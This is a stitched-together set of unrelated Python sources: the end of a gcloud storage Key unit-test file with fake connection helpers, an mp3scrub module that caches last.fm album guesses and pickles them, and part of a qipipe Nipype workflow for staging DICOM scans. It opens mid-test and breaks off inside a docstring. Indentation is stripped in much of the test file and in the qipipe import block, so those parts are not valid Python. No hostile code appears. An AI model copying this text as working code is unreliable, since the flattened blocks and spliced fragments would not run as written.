KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
ID = 'ID'
properties = {'id': ID}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.id, ID)
def test_md5_hash_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
MD5_HASH = 'DEADBEEF'
properties = {'md5Hash': MD5_HASH}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.md5_hash, MD5_HASH)
def test_md5_hash_setter(self):
KEY = 'key'
MD5_HASH = 'DEADBEEF'
after = {'md5Hash': MD5_HASH}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.md5_hash = MD5_HASH
self.assertEqual(key.md5_hash, MD5_HASH)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'md5Hash': MD5_HASH})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_media_link(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
MEDIA_LINK = 'http://example.com/media/'
properties = {'mediaLink': MEDIA_LINK}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.media_link, MEDIA_LINK)
def test_metadata_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
METADATA = {'foo': 'Foo'}
properties = {'metadata': METADATA}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.metadata, METADATA)
def test_metadata_setter(self):
KEY = 'key'
METADATA = {'foo': 'Foo'}
after = {'metadata': METADATA}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.metadata = METADATA
self.assertEqual(key.metadata, METADATA)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'metadata': METADATA})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_metageneration(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
METAGENERATION = 42
properties = {'metageneration': METAGENERATION}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.metageneration, METAGENERATION)
def test_owner(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
OWNER = {'entity': 'project-owner-12345', 'entityId': '23456'}
properties = {'owner': OWNER}
key = self._makeOne(bucket, KEY, properties)
owner = key.owner
self.assertEqual(owner['entity'], 'project-owner-12345')
self.assertEqual(owner['entityId'], '23456')
def test_self_link(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
SELF_LINK = 'http://example.com/self/'
properties = {'selfLink': SELF_LINK}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.self_link, SELF_LINK)
def test_size(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
SIZE = 42
properties = {'size': SIZE}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.size, SIZE)
def test_storage_class(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
STORAGE_CLASS = 'http://example.com/self/'
properties = {'storageClass': STORAGE_CLASS}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.storage_class, STORAGE_CLASS)
def test_time_deleted(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
TIME_DELETED = '2014-11-05T20:34:37Z'
properties = {'timeDeleted': TIME_DELETED}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.time_deleted, TIME_DELETED)
def test_updated(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
UPDATED = '2014-11-05T20:34:37Z'
properties = {'updated': UPDATED}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.updated, UPDATED)
class _Responder(object):
def __init__(self, *responses):
self._responses = responses[:]
self._requested = []
def _respond(self, **kw):
self._requested.append(kw)
response, self._responses = self._responses[0], self._responses[1:]
return response
class _Connection(_Responder):
    """Fake gcloud connection: records API requests and signed-URL calls."""

    API_BASE_URL = 'http://example.com'
    USER_AGENT = 'testing 1.2.3'

    def __init__(self, *responses):
        super(_Connection, self).__init__(*responses)
        self._signed = []
        self.http = _HTTP(*responses)

    def api_request(self, **kw):
        """Record and answer a JSON-API style request."""
        return self._respond(**kw)

    def build_api_url(self, path, query_params=None,
                      api_base_url=API_BASE_URL, upload=False):
        from urllib import urlencode
        from urlparse import urlsplit
        from urlparse import urlunsplit
        # mimic the build_api_url interface, but avoid unused param and
        # missed coverage errors
        upload = not upload  # pragma NO COVER
        query = urlencode(query_params or {})
        scheme, netloc = urlsplit(api_base_url)[:2]
        return urlunsplit((scheme, netloc, path, query, ''))

    def generate_signed_url(self, resource, expiration, **kw):
        """Record the signing request and return a canned signed URL."""
        self._signed.append((resource, expiration, kw))
        return ('http://example.com/abucket/akey?Signature=DEADBEEF'
                '&Expiration=%s' % expiration)
class _HTTP(_Responder):
    """Fake httplib2-style client that records raw HTTP requests."""

    def request(self, uri, method, headers, body, **kw):
        kw.update(uri=uri, method=method, headers=headers, body=body)
        return self._respond(**kw)
class _Bucket(object):
path = '/b/name'
name = 'name'
def __init__(self, connection):
self.connection = connection
self._keys = {}
self._deleted = []
def get_key(self, key):
return self._keys.get(key)
def copy_key(self, key, destination_bucket, new_name):
destination_bucket._keys[new_name] = self._keys[key.name]
return key.from_dict({'name': new_name}, bucket=destination_bucket)
def delete_key(self, key):
del self._keys[key.name]
self._deleted.append(key.name)
|
|
'''
this is a module (used as a singleton) that keeps track of the artists, albums,
and tracks we've found so far in the mp3 collection. Keeping track of these is
key to the algorithm of choosing correct album names (see refineGuessCache).
internally there are 3 global dicts.
ARTIST_META_CACHE: just to cache the lastfm calls for ALL artist/album/track info
TRACK_GUESS_CACHE:
ALBUM_GUESS_CACHE: these two dicts keep track of the same info (the artists, albums,
tracks, and associated mp3 path names). I use 2 dicts because it
makes the refineGuessCache algorithm much easier.
'''
import sys, pickle, os
from mp3scrub.util import strtool, mylog
from mp3scrub import globalz
from mp3scrub.util.musicTypes import Artist, Album, Track
from mp3scrub.netquery import lastfmquery, googquery
# track_cache['artist_name']['mp3Path'] = (Track obj)
TRACK_GUESS_CACHE = {}
# album_cache['artist_name']['albumName'] = Album obj
ALBUM_GUESS_CACHE = {}
# artist_cache['artist_name'] = Artist obj
ARTIST_META_CACHE = {}
# google artist lookup cache
GOOG_META_CACHE = {}
def clearCache():
    ''' reset the per-run guess caches.

    Only TRACK_GUESS_CACHE and ALBUM_GUESS_CACHE are cleared; the
    persistent ARTIST_META_CACHE / GOOG_META_CACHE lookup caches are
    left intact.
    '''
    TRACK_GUESS_CACHE.clear()
    ALBUM_GUESS_CACHE.clear()
def _updateArtistCache(fixed_artist_str):
    '''
    input: clean artist name.
    output: ArtistObj
    details: will update the local cache so we only query lastfm once per artist.
    '''
    # load up the artist info from last.fm on a cache miss only
    # (idiom fix: 'x not in d' instead of 'not x in d').
    if fixed_artist_str not in ARTIST_META_CACHE:
        mylog.INFO('looking up %s metadata...' % fixed_artist_str)
        ARTIST_META_CACHE[fixed_artist_str] = lastfmquery.getAllArtistInfo(fixed_artist_str)
    return ARTIST_META_CACHE[fixed_artist_str]
def _updateTrackGuesses(artist_name, path_name, track_obj):
    ''' accumulate an album candidate for the mp3 at *path_name*.

    The first call for a path stores a copy of *track_obj* with its album
    list emptied; every call (one per matching album) then appends
    ``track_obj.album`` as a candidate.
    '''
    per_artist = TRACK_GUESS_CACHE.setdefault(artist_name, {})
    if not per_artist.get(path_name):
        # only using track_obj as a trackname/trackno bean
        bean = track_obj.copy()
        del bean.albums[:]
        per_artist[path_name] = bean
    per_artist[path_name].addAlbum(track_obj.album)
def _updateAlbumGuesses(artist_name, track_obj, album_obj):
    ''' accumulate a matched track under an album candidate.

    The first sighting of an album stores a copy of *album_obj* with its
    track list emptied; every call then appends a copy of *track_obj*.
    '''
    per_artist = ALBUM_GUESS_CACHE.setdefault(artist_name, {})
    if not per_artist.get(album_obj.name):
        shell = album_obj.copy()
        del shell.tracks[:]
        per_artist[album_obj.name] = shell
    mylog.DBG1(4,'ALGDBG: adding track \'%s\' to album \'%s\'...' %
               (track_obj.name, album_obj.name))
    per_artist[album_obj.name].addTrack(track_obj.copy())
def getRawArtistInfo(artist_str):
    ''' return the cached last.fm metadata for *artist_str*, querying on a miss. '''
    # _updateArtistCache both fills the cache and returns the cached entry.
    return _updateArtistCache(artist_str)
def updateGuessCache(path_str, id3_track_str, fixed_artist_str):
    ''' called once per new mp3 processed. adds all possible track/album matches to a list
    that will be further narrowed down later to one match.

    :param path_str: the mp3 file path (used as the track cache key)
    :param id3_track_str: the track title from the id3 tag
    :param fixed_artist_str: the cleaned-up artist name
    :return: True if at least one album contained a matching track
    '''
    found_track = False
    # lookup the full artist/album info if haven't already
    artist_obj = _updateArtistCache(fixed_artist_str)
    # remove junky parens from the id3 title once up front -- it does not
    # change per album, so it was hoisted out of the loop below.
    # see strtool for details.
    clean_id3_track_str = strtool.removeTrackJunk(id3_track_str)
    # we loop through all the tracks, looking for the one with the least difference
    # from id3_track_str. see strtool for more info
    for i, album_obj in enumerate(artist_obj.albums):
        # NOTE(review): '>' admits ALBUM_GUESS_LIMIT + 1 albums; confirm
        # whether '>=' was intended before changing.
        if i > globalz.ALBUM_GUESS_LIMIT:
            break
        if not album_obj.name:
            mylog.DBG('null album length for artist \'%s\' track \'%s\'' %
                      (fixed_artist_str, id3_track_str))
            continue
        guess_album_obj = album_obj.copy()
        best_track_matches = []
        # loop through all the track in this album, searching for the specified track
        for track_obj in album_obj.tracks:
            targ_track_str = strtool.removeTrackJunk(track_obj.name)
            mylog.DBG1(10,'comparing mytrack_obj: \'%s\' guesstrack: \'%s\' guessalbum: \'%s\'' %
                       (clean_id3_track_str, targ_track_str, album_obj.name))
            dist = strtool.trackCompare(clean_id3_track_str, targ_track_str)
            if dist != -1:
                mylog.DBG1(10,'track match: \'%s\' guesstrack: \'%s\' guessalbum: \'%s\'' %
                           (clean_id3_track_str, targ_track_str, album_obj.name))
                guess_track_obj = Track(_album=album_obj.name, _name=targ_track_str,
                                        _track_num=track_obj.track_num, _path=path_str)
                best_track_matches.append((dist, guess_track_obj))
        # if we found a match...
        if best_track_matches:
            # record the track with the least dist from id3's trackName
            best_track_matches.sort()
            best_track_obj = best_track_matches[0][1]
            _updateTrackGuesses(artist_obj.name, path_str, best_track_obj)
            _updateAlbumGuesses(artist_obj.name, best_track_obj, guess_album_obj)
            found_track = True
    return found_track
def refineGuessCache():
    ''' narrow down album guesses after everything's been processed.

    REFINE STEPS
      1. sort your albums from best to worst, ranked by:
            (%complete * %complete * albumRank * total_tracks)
      2. look at all your tracks from your current top album.
         a) remove all these tracks from lesser albums (cause they're a
            worse match)
         b) add the current top album to a 'processed' list, so we don't
            process it again
         c) since removing tracks from lesser albums will change their
            %complete rank, resort by going back to step 1
      3. repeat until all albums processed
    '''
    def removeTrackElsewhere(track_obj, keep_album_str, alb_ptr, trkPtr):
        ''' helper function that keeps a track in one album but removes it everywhere else '''
        mylog.DBG1(10,'keeping %s in %s\n' % (track_obj.name, keep_album_str))
        modded = False
        # Dump the album/track state before modification (verbose debug only).
        if globalz.LOG_DEBUG > 8:
            for i,alb in enumerate(alb_ptr):
                for y, trk in enumerate(alb_ptr[alb].tracks):
                    mylog.DBG1(8,'albName: \'%s\' albptrTrk1 %d: \'%s\'\n' % (alb, y, unicode(trk.name)))
        # delete the current track in every album that's not here
        for del_album in alb_ptr:
            if del_album == keep_album_str: continue
            # delete track from all other albums in album cache
            # NOTE(review): the track list is mutated (via remove) while it
            # is being iterated; the inner while re-tests membership, which
            # appears to compensate -- confirm before restructuring.
            for t in alb_ptr[del_album].tracks:
                if track_obj == t:
                    while t in alb_ptr[del_album].tracks:
                        alb_ptr[del_album].tracks.remove(t)
                    modded = True
        # delete all other albums from TRACK_GUESS_CACHE
        if keep_album_str in trkPtr[track_obj.path].albums:
            # The kept album is a known candidate: make it the final choice.
            trkPtr[track_obj.path].album = keep_album_str
        else:
            # Otherwise drop every candidate album for this track.
            del trkPtr[track_obj.path].albums[:]
        # Dump the album/track state after modification (verbose debug only).
        if globalz.LOG_DEBUG > 8:
            for i,alb in enumerate(alb_ptr):
                for y, trk in enumerate(alb_ptr[alb].tracks):
                    mylog.DBG1(8,'albName2: \'%s\' albptrTrk %d: \'%s\'\n' % (alb, y, unicode(trk.name)))
        return modded

    def reSortAlbums(my_albums, alb_ptr, skip_albums):
        ''' sort album list by appropriateness'''
        # Rebuild my_albums in place so the caller's list object is updated.
        if my_albums: del my_albums[:]
        for album in alb_ptr:
            ptr = alb_ptr[album]
            tracks_found = len(ptr.tracks)
            if album in skip_albums: continue
            if tracks_found == 0: continue
            # easiest to calculate % here
            ptr.pct_complete = float(tracks_found) / ptr.total_tracks
            ptr.pct_score = (ptr.pct_complete * ptr.pct_complete * ptr.rank * tracks_found)
            mylog.DBG1(4,'ALGDBG: artist: %s album: %s complete: %f rank: %d found: %d' %
                       (ptr.artist, ptr.name, ptr.pct_complete, ptr.rank, tracks_found))
            my_albums.append((ptr.pct_score, album))
        # Best (highest score) album first.
        my_albums.sort(reverse=True)

    # iterate through the potential album list
    for artist in sorted(ALBUM_GUESS_CACHE):
        albums_ptr = ALBUM_GUESS_CACHE[artist]
        tracks_ptr = TRACK_GUESS_CACHE[artist]
        sort_all_albums = []
        reSortAlbums(sort_all_albums, albums_ptr, [])
        processed_albums = []
        # Repeatedly claim the current best album's tracks and resort,
        # until every album has been processed (step 3 above).
        while sort_all_albums:
            resort = False
            for _, better_album in sort_all_albums:
                if resort: break
                ptr = albums_ptr[better_album]
                # Iterate a copy: removeTrackElsewhere mutates track lists.
                for trk in ptr.tracks[:]:
                    # delete the current trk in every album that's not here
                    removeTrackElsewhere(trk, better_album, albums_ptr, tracks_ptr)
                processed_albums.append(better_album)
                reSortAlbums(sort_all_albums, albums_ptr, processed_albums)
                resort = True
def searchGuessCache(artist_str, path_str):
    ''' given an artistname and path, see if we found a guess.

    Returns the guessed Track bean, or None when no guess (or no chosen
    album) exists for the mp3 at *path_str*.
    '''
    mylog.DBG1(10,'searching for artist %s and path %s\n' % (artist_str, path_str))
    per_artist = TRACK_GUESS_CACHE.get(artist_str)
    guess = per_artist.get(path_str) if per_artist else None
    if not guess or not guess.album:
        mylog.ERR('no album found for MP3 %s\n' % (path_str))
        return None
    return guess
def dbgPrint(fileDes):
    ''' dump the artist metadata, track, and album caches to *fileDes*. '''
    def uniP(*x):
        # Print each argument on its own line, UTF-8 encoded.
        # Bug fix: previously printed the whole argument tuple ``x`` on
        # every iteration instead of the current argument ``i``.
        for i in x:
            print >> fileDes, unicode(i).encode('utf-8')
    for artist in ARTIST_META_CACHE:
        uniP('ARTIST: ', artist)
        alb_ptr = ARTIST_META_CACHE[artist].albums
        for a in alb_ptr:
            uniP('ALBUM: {0:30} ==> {1}\n'.format('', unicode(a)))
            for t in a.tracks:
                uniP('{0:>35} {1:>30}\n'.format('TRACK:', unicode(t)))
    uniP('\n\n\n')
    uniP('TRACK INFO:')
    for trk in TRACK_GUESS_CACHE:
        for t in TRACK_GUESS_CACHE[trk]:
            uniP('{0:30} ==> {1}'.format(t, unicode(TRACK_GUESS_CACHE[trk][t])))
    uniP('\n\n\n')
    uniP('ALBUM INFO:')
    for alb in ALBUM_GUESS_CACHE:
        for a in ALBUM_GUESS_CACHE[alb]:
            for t in ALBUM_GUESS_CACHE[alb][a].tracks:
                uniP('{0:>35} {1:>30}\n'.format('TRACK:', unicode(t)))
    uniP('\n\n\n')
def undump():
    ''' if we've already queried artist info in the past, load it up, son!

    Loads ARTIST_META_CACHE then GOOG_META_CACHE from the pickle file
    (same order as dump() writes them). A corrupt or truncated pickle is
    not fatal: the caches are reset and the bad file is removed.
    '''
    global ARTIST_META_CACHE
    global GOOG_META_CACHE
    if os.path.exists(globalz.PICKLE_FILE):
        with open(globalz.PICKLE_FILE,'rb') as fl:
            try:
                ARTIST_META_CACHE = pickle.load(fl)
                GOOG_META_CACHE = pickle.load(fl)
            except Exception:
                # Narrowed from a bare 'except:' so SystemExit and
                # KeyboardInterrupt are no longer swallowed.
                mylog.ERR('error loading pickle file, continuing...')
                ARTIST_META_CACHE = {}
                GOOG_META_CACHE = {}
                os.remove(globalz.PICKLE_FILE)
def dump():
    ''' save off the artist info we've found for next time.

    Writes ARTIST_META_CACHE then GOOG_META_CACHE with the highest pickle
    protocol; undump() must load them back in the same order.
    '''
    with open(globalz.PICKLE_FILE, 'wb') as fl:
        pickle.dump(ARTIST_META_CACHE, fl, -1)
        pickle.dump(GOOG_META_CACHE, fl, -1)
def queryGoogCache(artist_name):
    ''' cache google queries to avoid web io.

    Returns the cached googquery result pack for *artist_name*, issuing
    the web query only on a cache miss.
    '''
    cached = GOOG_META_CACHE.get(artist_name)
    if cached:
        mylog.DBG1(10,'GOOG_META_CACHE: found key \'%s\' val: \'%s\'' % (artist_name, unicode(cached)))
        return cached
    mylog.DBG1(10,'GOOG_META_CACHE: not found key \'%s\'' % (artist_name))
    GOOG_META_CACHE[artist_name] = googquery.googquery(unicode(artist_name).encode('utf-8'))
    return GOOG_META_CACHE.get(artist_name)
####################################
if __name__ == '__main__':
    # Ad-hoc command-line driver (Python 2):
    #   usage: prog artist_name track1,track2,track3
    # Resolves the artist name, guesses an album for each track, refines
    # the guesses, prints the caches, and persists the lookup caches.
    input_arg = ''        # NOTE(review): unused -- confirm before removing
    processDir = False    # NOTE(review): unused -- confirm before removing
    globalz.PICKLE_FILE = 'meh.pkl'
    # if we've already queried artist info in the past, load it up, son!
    undump()
    try:
        artist_str = sys.argv[1]
        track_str = sys.argv[2]
    except IndexError:
        print 'usage: %s artist_name track1, track2, track3' % sys.argv[0]
        exit(1)
    # Resolve the (possibly misspelled) artist name via the Google cache.
    (net_error, real_artist_str) = queryGoogCache(artist_str)
    if net_error:
        print 'net connection failure'
        exit(1)
    tracks = track_str.split(',')
    for (i, track) in enumerate(tracks):
        # Synthesize a unique per-track "path" since there are no real
        # mp3 files on the command line.
        updateGuessCache('%s%d' % (track, i), track, real_artist_str)
    refineGuessCache()
    dbgPrint(sys.stdout)
    # save off the artist info we've found for next time
    dump()
|
|
import os
import glob
import shutil
import itertools
import logging
# The ReadTheDocs build does not include nipype.
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if not on_rtd:
# Disable nipype nipy import FutureWarnings.
import warnings
with warnings.catch_warnings():
warnings.simplefilter(action='ignore', category=FutureWarning)
from nipype.pipeline import engine as pe
from nipype.interfaces.utility import (IdentityInterface, Function)
from nipype.interfaces.dcmstack import (DcmStack, MergeNifti)
import qixnat
from ..interfaces import (StickyIdentityInterface, FixDicom, Compress)
from .workflow_base import WorkflowBase
from ..helpers.constants import (
SCAN_TS_BASE, SCAN_TS_FILE, VOLUME_DIR_PAT, VOLUME_FILE_PAT
)
from ..helpers.logging import logger
from ..staging import (iterator, image_collection)
from ..staging.ohsu import MULTI_VOLUME_SCAN_NUMBERS
from ..staging.sort import sort
from .pipeline_error import PipelineError
SCAN_METADATA_RESOURCE = 'metadata'
"""The label of the XNAT resource holding the scan configuration."""
SCAN_CONF_FILE = 'scan.cfg'
"""The XNAT scan configuration file name."""
def run(subject, session, scan, *in_dirs, **opts):
    """
    Runs the staging workflow on the given DICOM input directory.
    The return value is a {*volume*: *file*} dictionary, where *volume*
    is the volume number and *file* is the 3D NIfTI volume file.

    :param subject: the subject name
    :param session: the session name
    :param scan: the scan number
    :param in_dirs: the input DICOM file directories
    :param opts: the :class:`ScanStagingWorkflow` initializer options
    :return: the :meth:`ScanStagingWorkflow.run` result
    """
    # The target directory for the fixed, compressed DICOM files.
    _logger = logger(__name__)
    dest_opt = opts.pop('dest', None)
    if dest_opt:
        dest = os.path.abspath(dest_opt)
        if not os.path.exists(dest):
            os.makedirs(dest)
    else:
        dest = os.getcwd()
    # Print a debug log message. A singleton directory is unwrapped for
    # readability; otherwise the directories are logged as a plain list
    # (idiom fix: list(in_dirs) replaces the copy comprehension).
    in_dirs_s = in_dirs[0] if len(in_dirs) == 1 else list(in_dirs)
    _logger.debug("Staging the %s %s scan %d files in %s..." %
                  (subject, session, scan, in_dirs_s))
    # We need the collection up front before creating the workflow, so
    # we can't follow the roi or registration idiom of delegating to the
    # workflow constructor to determine the collection.
    coll_opt = opts.pop('collection', None)
    if coll_opt:
        collection = coll_opt
    else:
        parent_wf = opts.get('parent')
        if parent_wf:
            collection = parent_wf.collection
        else:
            raise PipelineError('The staging collection could not be'
                                ' determined from the options')
    # Make the scan workflow.
    is_multi_volume = scan in MULTI_VOLUME_SCAN_NUMBERS
    scan_wf = ScanStagingWorkflow(is_multi_volume=is_multi_volume, **opts)
    # Sort the volumes.
    vol_dcm_dict = sort(collection, scan, *in_dirs)
    # Execute the workflow.
    return scan_wf.run(collection, subject, session, scan, vol_dcm_dict, dest)
class ScanStagingWorkflow(WorkflowBase):
    """
    The ScanStagingWorkflow class builds and executes the scan
    staging supervisory Nipype workflow. This workflow delegates
    to :meth:`qipipe.pipeline.staging.stage_volume` for each
    iterated scan volume.

    The scan staging workflow input is the *input_spec* node
    consisting of the following input fields:

    - *collection*: the collection name
    - *subject*: the subject name
    - *session*: the session name
    - *scan*: the scan number

    The scan staging workflow has one iterable:

    - the *iter_volume* node with input fields *volume* and *in_files*

    This iterable must be set prior to workflow execution.

    The staging workflow output is the *output_spec* node consisting
    of the following output field:

    - *out_file*: the 3D volume stack NIfTI image file
    """

    def __init__(self, is_multi_volume=True, **opts):
        """
        :param is_multi_volume: flag indicating whether to include
            volume merge tasks
        :param opts: the :class:`qipipe.pipeline.workflow_base.WorkflowBase`
            initializer keyword arguments
        """
        super(ScanStagingWorkflow, self).__init__(__name__, **opts)
        # The scan staging workflow sequence described in
        # :class:`qipipe.pipeline.staging.StagingWorkflow`.
        self.workflow = self._create_workflow(is_multi_volume)

    def run(self, collection, subject, session, scan, vol_dcm_dict, dest):
        """
        Executes this scan staging workflow.

        :param collection: the collection name
        :param subject: the subject name
        :param session: the session name
        :param scan: the scan number
        :param vol_dcm_dict: the input {volume: DICOM files} dictionary
        :param dest: the destination directory
        :return: the (time series, volume files) tuple
        """
        # Set the top-level inputs.
        input_spec = self.workflow.get_node('input_spec')
        input_spec.inputs.collection = collection
        input_spec.inputs.subject = subject
        input_spec.inputs.session = session
        input_spec.inputs.scan = scan
        input_spec.inputs.dest = dest
        # The volume grouping tag.
        img_coll = image_collection.with_name(collection)
        volume_tag = img_coll.patterns.volume
        if not volume_tag:
            raise PipelineError('The collection configuration DICOM'
                                ' volume tag is missing.')
        input_spec.inputs.volume_tag = volume_tag
        # Prime the volume iterator. Iterating the dict directly yields
        # its keys and, unlike the former iterkeys() call, works on both
        # Python 2 and Python 3.
        in_volumes = sorted(vol_dcm_dict)
        dcm_files = [vol_dcm_dict[v] for v in in_volumes]
        iter_dict = dict(volume=in_volumes, in_files=dcm_files)
        iterables = iter_dict.items()
        iter_volume = self.workflow.get_node('iter_volume')
        iter_volume.iterables = iterables
        # Iterate over the volumes and corresponding DICOM files
        # in lock-step.
        iter_volume.synchronize = True
        # Execute the workflow.
        wf_res = self._run_workflow()
        # If dry_run, then _run_workflow is a no-op.
        if not wf_res:
            return
        # The magic incantation to get the Nipype workflow result.
        output_res = next(n for n in wf_res.nodes() if n.name == 'output_spec')
        time_series = output_res.inputs.get()['time_series']
        volume_files = output_res.inputs.get()['volume_files']
        self.logger.debug(
            "Executed the %s workflow on the %s %s scan %d to create"
            " %d volume files and the 4D time series %s." %
            (self.workflow.name, subject, session, scan,
             len(volume_files), time_series)
        )
        # Return the (time series, volume files) result.
        return time_series, volume_files

    def _create_workflow(self, is_multi_volume=True):
        """
        Makes the staging workflow described in
        :class:`qipipe.pipeline.staging.StagingWorkflow`.

        :param is_multi_volume: flag indicating whether to include
            volume merge tasks
        :return: the new workflow
        """
        self.logger.debug('Building the scan staging workflow...')
        # The Nipype workflow object.
        workflow = pe.Workflow(name='stage_scan', base_dir=self.base_dir)
        # The workflow input.
        hierarchy_fields = ['subject', 'session', 'scan']
        stg_fields = hierarchy_fields + ['collection', 'dest']
        in_fields = stg_fields + ['volume_tag']
        input_spec = pe.Node(IdentityInterface(fields=in_fields),
                             name='input_spec')
        self.logger.debug("The %s workflow input node is %s with fields %s" %
                          (workflow.name, input_spec.name, in_fields))
        # The volume iterator.
        iter_fields = ['volume', 'in_files']
        iter_volume = pe.Node(IdentityInterface(fields=iter_fields),
                              name='iter_volume')
        self.logger.debug("The %s workflow volume iterator node is %s"
                          " with fields %s" %
                          (workflow.name, iter_volume.name, iter_fields))
        # The volume staging node wraps the stage_volume function.
        stg_inputs = stg_fields + iter_fields + ['opts']
        stg_xfc = Function(input_names=stg_inputs, output_names=['out_file'],
                           function=stage_volume)
        stage = pe.Node(stg_xfc, name='stage_volume')
        stage.inputs.opts = self._child_options()
        for fld in stg_fields:
            workflow.connect(input_spec, fld, stage, fld)
        for fld in iter_fields:
            workflow.connect(iter_volume, fld, stage, fld)
        # Collect the 3D volume files.
        collect_xfc = IdentityInterface(fields=['volume_files'])
        collect_vols = pe.JoinNode(
            collect_xfc, joinsource='iter_volume',
            joinfield='volume_files', name='collect_volumes'
        )
        workflow.connect(stage, 'out_file', collect_vols, 'volume_files')
        # Upload the processed DICOM and NIfTI files.
        # The upload out_files output is the volume files.
        upload_fields = (
            hierarchy_fields +
            ['project', 'dcm_dir', 'volume_files', 'time_series']
        )
        upload_xfc = Function(input_names=upload_fields,
                              output_names=[],
                              function=_upload)
        upload = pe.Node(upload_xfc, name='upload')
        upload.inputs.project = self.project
        workflow.connect(input_spec, 'subject', upload, 'subject')
        workflow.connect(input_spec, 'session', upload, 'session')
        workflow.connect(input_spec, 'scan', upload, 'scan')
        workflow.connect(input_spec, 'dest', upload, 'dcm_dir')
        workflow.connect(collect_vols, 'volume_files', upload, 'volume_files')
        if is_multi_volume:
            # Merge the volumes into a 4D time series.
            merge_xfc = MergeNifti(out_format=SCAN_TS_BASE)
            merge = pe.Node(merge_xfc, name='merge')
            workflow.connect(input_spec, 'volume_tag',
                             merge, 'sort_order')
            workflow.connect(collect_vols, 'volume_files',
                             merge, 'in_files')
            self.logger.debug('Connected staging to scan time series merge.')
            workflow.connect(merge, 'out_file',
                             upload, 'time_series')
            # This debug message was previously emitted even for
            # single-volume scans; it now only fires when the merge
            # node is actually connected.
            self.logger.debug('Connected scan time series merge to upload.')
        else:
            # A single-volume scan has no 4D time series.
            upload.inputs.time_series = None
        # The output is the 4D time series and 3D NIfTI volume image files.
        output_fields = ['time_series', 'volume_files']
        output_spec = pe.Node(StickyIdentityInterface(fields=output_fields),
                              name='output_spec')
        workflow.connect(collect_vols, 'volume_files',
                         output_spec, 'volume_files')
        if is_multi_volume:
            workflow.connect(merge, 'out_file', output_spec, 'time_series')
        else:
            output_spec.inputs.time_series = None
        # Instrument the nodes for cluster submission, if necessary.
        self._configure_nodes(workflow)
        return workflow
class VolumeStagingWorkflow(WorkflowBase):
    """
    The StagingWorkflow class builds and executes the staging Nipype workflow.
    The staging workflow includes the following steps:

    - Group the input DICOM images into volume.

    - Fix each input DICOM file header using the
      :class:`qipipe.interfaces.fix_dicom.FixDicom` interface.

    - Compress each corrected DICOM file.

    - Upload each compressed DICOM file into XNAT.

    - Stack each new volume's 2-D DICOM files into a 3-D volume NIfTI file
      using the DcmStack_ interface.

    - Upload each new volume stack into XNAT.

    - Make the CTP_ QIN-to-TCIA subject id map.

    - Collect the id map and the compressed DICOM images into a target
      directory in collection/subject/session/volume format for TCIA
      upload.

    The staging workflow input is the *input_spec* node consisting of
    the following input fields:

    - *collection*: the collection name

    - *subject*: the subject name

    - *session*: the session name

    - *scan*: the scan number

    The staging workflow has two iterables:

    - the *iter_volume* node with input fields *volume* and *dest*

    - the *iter_dicom* node with input fields *volume* and *dicom_file*

    These iterables must be set prior to workflow execution. The
    *iter_volume* *dest* input is the destination directory for
    the *iter_volume* *volume*.

    The *iter_dicom* node *itersource* is the ``iter_volume.volume``
    field. The ``iter_dicom.dicom_file`` iterables is set to the
    {volume: [DICOM files]} dictionary.

    The DICOM files to upload to TCIA are placed in the destination
    directory in the following hierarchy:

        ``/path/to/dest/``
            *subject*\ /
                *session*\ /
                    ``volume``\ *volume number*\ /
                        *file*
                        ...

    where:

    - *subject* is the subject name, e.g. ``Breast011``

    - *session* is the session name, e.g. ``Session03``

    - *volume number* is determined by the
      :attr:`qipipe.staging.image_collection.Collection.patterns`
      ``volume`` DICOM tag

    - *file* is the DICOM file name

    The staging workflow output is the *output_spec* node consisting
    of the following output field:

    - *image*: the 3D volume stack NIfTI image file

    .. Note:: Concurrent XNAT upload fails unpredictably due to one of
        the causes described in the ``qixnat.facade.XNAT.find`` method
        documentation.

        The errors are addressed by the following measures:

        * setting an isolated ``pyxnat`` *cache_dir* for each execution
          node

        * serializing the XNAT find-or-create access points with
          ``JoinNode``s

        * increasing the SGE submission resource parameters as shown in
          the ``conf/staging.cfg [upload]`` section

    .. _CTP: https://wiki.cancerimagingarchive.net/display/Public/Image+Submitter+Site+User%27s+Guide

    .. _DcmStack: http://nipy.sourceforge.net/nipype/interfaces/generated/nipype.interfaces.dcmstack.html
    """

    def __init__(self, **opts):
        """
        If the optional configuration file is specified, then the workflow
        settings in that file override the default settings.

        :param opts: the :class:`qipipe.pipeline.workflow_base.WorkflowBase`
            initializer keyword arguments
        """
        super(VolumeStagingWorkflow, self).__init__(__name__, **opts)
        # Make the workflow.
        self.workflow = self._create_workflow()
        """
        The staging workflow sequence described in
